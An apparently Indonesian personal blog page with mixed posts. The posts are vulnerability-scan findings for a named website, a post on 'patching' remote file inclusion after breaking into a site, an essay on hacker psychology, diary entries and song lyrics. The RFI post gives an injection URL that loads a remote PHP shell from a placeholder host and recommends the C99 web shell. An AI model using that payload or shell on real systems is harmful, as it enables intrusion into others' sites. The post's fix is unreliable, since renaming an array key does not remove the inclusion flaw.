celah keamanan pada http://mydjournal.org

1. Apache Mod_SSL SSL_Util_UUEncode_Binary Staack Buffer Overflow Vuln

Vulnerability description :
This alert was generated using only banner information. It may be a false positive.

A stack-based buffer overflow has been reported in the Apache mod_ssl module. This issue would most likely result in a denial of service if triggered, but could theoretically allow for execution of arbitrary code. The issue is not believed to be exploitable to execute arbitrary code on x86 architectures, though this may not be the case with other architectures.

Affected mod_ssl versions (up to 2.8.17).

This vulnerability affects mod_ssl.

The impact of this vulnerability :
Denial of service and/or possible arbitrary code execution

Attack details :
Current version is mod_ssl/2.2.10 OpenSSL/0.9.8b mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Unknown

Web references :
http://www.securityfocus.com/bid/10355/
http://www.modssl.org/


2. Proxy accepts CONNECT requests

Vulnerability description :
The remote proxy server can be used to send CONNECT requests.
The proxy allows everyone to perform CONNECT HTTP requests to arbitrary ports.
This may allow attackers to bypass your firewall and connect to sensitive ports like 23 (telnet), 25 (sendmail) using the proxy. A spammer may be using your proxy to send bulk email.

Web references :
http://www.suretecsystems.com/our_docs/proxy-guide-en/index.html
http://en.wikipedia.org/wiki/Web_proxy
http://en.wikipedia.org/wiki/Open_proxy


3. Proxy can be used to connect to arbitrary

Vulnerability description :
The remote proxy server can be used to connect to arbitrary ports.
The proxy allows everyone to perform HTTP requests to arbitrary ports.
This may allow attackers to bypass your firewall and connect to sensitive ports like 23 (telnet), 25 (sendmail) using the proxy.
This vulnerability affects Server.

Attack details :
The proxy server is running on TCP port 8080

Web references :
http://www.suretecsystems.com/our_docs/proxy-guide-en/index.html
http://en.wikipedia.org/wiki/Web_proxy
http://en.wikipedia.org/wiki/Open_proxy

nb:
sorry bahasa inggrisnya belepotan.. wkwkwkwkwkwkwkwkwk.. met mentraslate ria...

Read More..

Patching RFI bug...[part 1] if you white hacker...

mungkin saja anda telah berhasil menjebol suatu website dengan memanfaatkan bug dari RFI. nah sekarang tinggal bagaimana pikiran anda? menyerang adalah hal yang mudah.. tetapi melindungi suatu website adalah kewajiban seorang hacker. disini saya tidak mengeshare bagaimana menjadi seorang attacker, tapi saya ingin mengeshare bagaimana melindungi suatu website.. jika anda black hacker, silahkan tinggalkan tulisan ini.

ok langsung saja.. anggap anda telah melakukan RFI pada sebuah website. saatnya melakukan patching terhadap RFI Vuln. saya menyarankan untuk memakai C99 PHP sheell, agar mudah untuk editing sourcenya. untuk melakukan patching, bug (celah) harus berada didirektori dengan permission 777, jika anda mempunyai hak akses root akan lebih bagus lagi karena bisa melakukan patching didirektori manapun yang anda inginkan. cara pertama patching RFI vuln :

---modifikasi file bug RFI---
coba anda lakukan PHP Injection ,enggunakan PHP Shell tadi. contoh : http://target.com/forum//photo/usercp_sendpasswd.php?phpbb_root_path[user]=http://tempathostingshell.com/shell.php?

bugnya adalah nama file yang paling belakang sebelum tanda tanya (usercp_sendpasswd.php). nah sekarang tinggal ngedit file itu. cari bagian yang bertuliskan "include($phpbb_root_path["user"]", itulah bug yang memungkinkan seorang attacker masuk. ubah tulisan "user" dengan nama lain, kemudian save.

selamat!. anda telah mempatch satu bugs.....

Read More..

Hacker dan Cracker "dari sisi psikologisnya"

PSIKOPOP
HACKER DAN CRACKER “dari sisi psikologisnya”
Pada zaman serba teknologi ini semakin banyak penemuan barang-barang berteknologi tinggi, yang memungkinkan seorang individu melakukan segala hal tanpa batas. Disisi lain semakin banyak pula kebutuhan hidup yang diperlukan oleh masyarakat, sedangkan keadaan ekonomi yang semakin hari semakin memnuruk. Hal ini menyebabkan banyaknya kriminalitas yang terjadi disekitar masyarakat pada kehidupan sehari-hari, khususnya negara Indonesia. Tinggi kebutuhan hidup masyarakat membuat setiap individu semakin mengritis dalam berfikir untuk memenuhi kebutuhan hidup sehari-hari.

Seorang hacker, atau yang biasa dikenal dengan hC, cbug, litherr, fwerd, d_ajax, r3dshadow, dll, dapat dibagi menjadi dua kategori, yaitu hacker dan cracker. Menurut Eric Raymond hacker didefinisikan sebagai ahli komputer yang pandai, sementara cracker dapat didefinisikan sebagai seseorang yang bisa masuk kedalam sistem orang lain, biasanya dijaringan komputer, mem-by-pass password atau lisensi program, atau secara sengaja merusak keamanan komputer. Nah sekarang kita akan bahas mengenai keduanya.

Hal itu pula yang membuat masyarakat semakin hari semakin bisa berfikir kritis untuk mencari rizki bagaimanapun caranya walaupun cara licik yang dijalaninya. Seperti kriminalitas komputerisasi yang sering kita sebut hacker. Kalangan hacker ini sangat sulit untuk dilacak, karena sindikat mereka tertutup rapi dibalik perangkat dan jaringan komputer. Menurut informasi, Indonesia adalah salah satu negara yang mempunyai hacker-hacker handal dan termasul peringkat 3 besar didunia. Seperti kasus Pemilu tahun 2004 yang sempat memusingkan pihak KPU dalam perhitungan suara. Biasanya kalangan ini melakukan kegiatan sehari-hari dengan komputer dan kegiatan coba-coba atau iseng-iseng biasa. Kebiasaan mereka adalah mencari celah kelemahan dari sebuah sistem, dan biasanya hanya mencari kepuasan pribadi untuk menunjukkan bahwa mereka bisa.

Kalangan hacker ini mempunyai keahlian untuk membobol sistem secara ilegal. Menurut informasi dari beberapa hacker, ada hacker yang bisa menjebol sistem perbankan, asalkan ada permintaan dari seseorang. Biasanya mereka memasang jumlah nominal tertentu, mereka melakukan pencurian kartu kredit dari database database yang dapat mereka peroleh dari kemampuan mereka. Mereka inilah dari kalangan kalangan yang biasa disebut carder. Dan biasanya negosiasi dengan mereka ataupun transaksi dengan mereka berlangsung secara sulit, dikarenakan untuk menjaga kerahasiaan idenitas asli mereka agar tidaqk terungkap oleh pihak yang berwajib. Sebenarnya, jika potensi dari orang-orang ini bisa dimaksimalkan oleh pemerintah indonesia, maka akan membantu dalam mengamankan jaringan internet di Republik Indonesia. Sebagian besar keluarga atau teman-teman dari para hacker ini tidak tahu kalau mereka melakukan tindakan tersebut, mereka tidak memberitahu kerabat mereka karena mereka beranggapan bahwa hacker bukan hal yang patut untuk diperbincangkan, bahkan ada kode etik yang mengatakan seorang hacker tidak boleh menganggap diri mereka sebagai seorang hacker.

Cracker biasanya melakukan tindakan-tindakan seperti yang sudah dikatakan diatas untuk menguji kemampuan dirinya, biasanya mereka menghitung waktu yang mereka perlu7kan untuk “menjebol” sistem keamanan, ada juga yang mengubah data karena merasa kurang senang dengan organisasi atau perusahaan tertentu, selain itu ada juga yang melakukan keuntungan pribadi dan untuk mendapatkan kepuasan pribadi, ada juga yang untuk sekedar bersenang-senang.

Ada dua macam dorongan yang membuat seorang cracker dan hacker melakukan tindakan-tindakannya yaitu, dorangan internal dan dorongan eksternal. Ada orang yang menjadi cracker atau hacker karena dorongan internal, misalnya, untuk memuaskan rasa ingin tahu mereka yang mereka dapatkan ketika mereka berhasil menembus sistem keamanan komputer, ada juga yang hanya sekedar ingin menguji pengetahuan yang mereka dapatkan sebelumnya. Sementara untuk dorongan eksternal, biasanya disebabkan karena mereka tidak puas dengan sistem yang ada.

Sebagian dari mereka merasa puas dengan kegiatan mereka, mereka merasa bahwa yang mereka lakukan paling tidak dapat mewakili ketidak puasan mereka, selain itu mereka merasa memiliki “dunia” mereka sendiri. Bagi beberapa hacker, menembuas sistem keamanan komputer mungkin merupakan kompensasi dari ketidakpuasan yang ada dalam dirinya, namun tidak dapat ia keluarkan secara langsung, namun ada juga yang menjadi hacker dengan alasan hobby atau karena cita-cita mereka sendiri. (dhymaz_spyro)

Read More..

Solusi.... untuk siapa aja??

baru keluar dari rumah sakit ney... bingun mo ngapain??? ngeblog aja dech.. lama gak mosting... tadi dikasih link dari si verri.. link blognya phiy. setelah gw baca baca,, apa yang gw lakuin slama ini terhadap orang2 yang curhat ma gw ternyata bener... 1 hal yang penting yang dapat gw petik dari situ.. :

Ada dua solusi berbeda yang dibutuhin sama masing2 pria dan wanita.
1) Solusi logis, untuk otak maskulin
2) Solusi emosional, untuk otak feminin

untuk lebih lengkapnya,, baca aja blognya... http://airudesu.co.cc/

Read More..

KU MULAI BISA MEMBUKA HATI......

hhmmmfff.... hari hari kulewati dengan penuh sesak.. selama ini aq selalu berjalan sendiri tanpa ada yang menopang disaat kujatuh. namun akhirnya ada yang mampu menopangku saat kujatuh, tapi dia tidak begitu kuat untuk menopangku. karena dia hanya bisa menopangku dari sebelah kiri dengan tangan kanannya. tidak ada keseimbangan yang kudapat. saat ini aq mulai bisa membuka hatiku buat orang lain yang mampu menopangku dari belakang dengan kedua tangannya. karena aq sadar.. tidak harusnya aq berlama lama terpuruk dengan keadaanku yang seperti ini hanya untuk mengingatnya.. tapi,,,, mengapa aq belum siap jatuh cinta lagi??????

Read More..

KONO MUNE NI

Bokuno kakao ga tsumatte iru
Hurui nikki o huto
Hiraitemiru
Anata no sashin mitsuke
Tayo

Bokura ga aishiatteta koro
Anata no emi ya odoketa kao
Ima wa mou soba ni inai
Satte shimatta

Nanimo nai
Anata o aisuru igai
Naze kounatte shimattano
Hitorikiri

Mosi huta tabi
Anata o teni iretara
Hanashi wa shinaiyo
Nido to

Anata o wasure rarenai
Itsumo kokoro no naka ni
Arunawa anata no kao dake dakara
Bokuwa negau anata ga
Modotte kite kureru koto
Kono mune ni

Read More..

HAPPY FUCKLENTINE

hari teramat hampa.... yah itulah 14 februari 2009, dimana orang orang sibuk merayakan hari kasih sayang yaitu valentine yang dikenal sebagai hari kasih sayang. ada apa sih ditanggal 14 februari itu? kata orang, itu dirayakan sebagai hari kasih sayang yang bagi gw itu salah besar... bukannya setiap hari itu penuh kasih sayang???? knapa coba harus dilambangkan dengan coklat??? aneh bagi gw.. maka dari itu sesuai dengan yang sebagian kecil orang, gw menyebut hari ini adalah hari fucklentine... karena gw hanya sendiri, dan mengenang masa lalu gw yang indah bersama dia sementara kebanyakan orang merayakannya dengan membagikan coklat dan kasih sayang mereka. brarti kasih sayang cuman ada dihari ini dunkz??? daar orang orang yang aneh.. dan kebanyakan orang merayakan dengan pasangannya masing masing,. dan ternyata,,, mereka tidak merayakan bersama orang tuanya dan keluarganya, bahkan tidak mengasih ucapan kepada mereka, dengan kata lain boleh gw simpulkan bahwa mereka lebih menyayangi pasangannya daripada orang tua dan keluarganya... dengan kata lain hari valentine adalah hari kasih sayang untuk "PACAR/PASANGAN".. dan gw menyebutnya................... FUCKLENTINE..................

Read More..